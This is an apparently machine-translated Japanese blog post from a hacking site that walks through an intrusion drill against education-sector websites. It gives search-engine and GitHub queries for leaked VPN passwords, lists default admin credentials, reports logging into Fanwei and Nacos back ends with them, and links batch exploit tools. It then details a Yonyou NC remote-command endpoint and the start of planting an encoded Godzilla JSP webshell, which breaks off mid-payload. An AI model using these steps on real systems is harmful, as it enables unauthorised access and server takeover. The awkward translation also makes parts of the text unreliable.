Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863103472

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x01外部ウェブサイトサービス

資産発見

マルチサービングおよびマッピングプラットフォーム検索3https://hunter.qianxin.com/

https://fofa.info/

https://Quake.360.cn/

image_X8BSXnkylx.png

image_ctJSWbXB6F.png

ターゲットサイトがxxxx.comの場合、多文字の検索は、さまざまな構文を介して資産を収集でき、収集された資産がより包括的になります。

ここでの例としてFOFAを取ります

domain='xxxx.com'

host='xxxx.com'

header='xxxx.com'

cert='xxxx.com'

機密情報漏れ

学校サイトの情報収集については、一般的に言えば、外部ネットワークから取得できるポイントはほとんどありません。ほとんどのWebアプリケーションはVPNの背後に配置されているため、VPNアカウントを取得するための努力の半分で結果の2倍になると言えます。この時点で、この情報は構文を介してマイニングできます。

一般的に使用されるコマンドは次のとおりです。

#Google構文

site:*.edu.cn intext: vpn |ユーザー名|パスワード|アカウント|デフォルトのパスワード

#github

*.edu.cnパスワード

image_22dBsSWKAO.png

この攻撃と防御のドリルの間、私は特定のサイトのVPNのデフォルトのパスワードを見つけることができて幸運でした。

image_i-KtUIqFmy.png

デフォルトのパスワード

一部のサイトでは、建設が完了した後、デフォルトのアカウントパスワードが変更されない場合があります。現時点では、デフォルトのアカウントパスワードを使用してログインすることができます。

Webサイトの一般的なデフォルトパスワードを次に示します

アカウント:

管理者管理者ルートユーザーテスト

パスワード:

Admin Admin123 123456 123テストルート

広く使用されているシステムの場合、Google Syntaxを介してデフォルトのパスワードを検索できます

image_ejxlTxW5Av.png

ここでは、Sysadmin/1を介してFanweiバックエンドに正常にログインします

t1sb-w5grl_9Xl3mB_bqn.png

NACOS/NACOS

image-20220723225803735.png

一般的なエクスプロイト

マルチターゲットの攻撃的および防御的なドリルについては、個人がターゲットサブドメインURLを収集するよりも優れています。

ブレークスルーの指紋認識結果から重要な資産を除外し、既知の脆弱性または1日を攻撃するために使用します

ここにいくつかのバッチエクスプロイトツールがあります:

https://github.com/anonymous-ghost/attackwebframeworktools-5.0

https://github.com/d3ckx1/fvuln

https://github.com/w01fh4cker/serein

log4j、shiro、struts2などのフレームワーククラス。

Zhiyuan、Fanwei、Ufida、Lan LingなどのOAカテゴリも、発見したターゲットUfida NCサイトでもあります。

ujiunic ncはシェルを書き込みます

56xk-0ba58_-A3uKrDLZX.png

インターフェイス/servlet/~ic/bsh.servlet.bshservletにアクセスして、コマンドを実行します

d5lhwsk0r8_WfpuDtbLpm.png

DNSLOGを検出した後、ネットワークから見つからないことがわかりました。ここでウェブシェルに直接書かれています。

1.最初にゴジラJSPトロイの木馬を生成し、次にUnicodeエンコードを実行します。

image_796oyMMBO3.png

2。その後、出力結果をエンコードするURL

image_zZUpiKMWn1.png

3.ペイロードフィールドは次のとおりです。ここに記載されているデフォルトのパスは、WebApps/NC_WEBで、実際の戦闘で柔軟に対応できます。

文字列キーワード=urldecoder.decode( '